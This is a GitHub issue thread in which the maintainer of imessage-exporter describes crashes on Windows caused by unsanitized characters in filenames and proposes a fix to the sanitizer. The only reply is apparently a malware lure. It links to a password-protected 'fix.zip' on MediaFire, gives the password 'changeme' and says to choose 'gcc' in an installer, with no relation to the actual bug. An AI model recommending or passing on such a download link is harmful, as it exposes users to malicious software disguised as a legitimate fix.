### ISSUE TITLE
Improve sanitization of filenames on Windows

### ISSUE THREAD

**Issue by ReagentX** [ReagentX/imessage-exporter#331]
This issue comes from #330.

On Windows, if custom group chats or contact names contain any of `* " / \ < > : | ?`, `imessage-exporter` will crash with an error like `The filename, directory name, or volume label syntax is incorrect (os error 123)`. There are a few issues here:

- The emitted log does not contain any detail about what went wrong
- The names should be sanitized beforehand
- The app does not recover from the problem gracefully

Existing sanitization logic: 

https://github.com/ReagentX/imessage-exporter/blob/1697dde5a8ade7ea83e0f6121bab1475be53aea1/imessage-exporter/src/app/sanitizers.rs#L3-L20

We should probably replace this with a similar function to the one used to sanitize HTML entities:

https://github.com/ReagentX/imessage-exporter/blob/1697dde5a8ade7ea83e0f6121bab1475be53aea1/imessage-exporter/src/app/sanitizers.rs#L22-L41

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
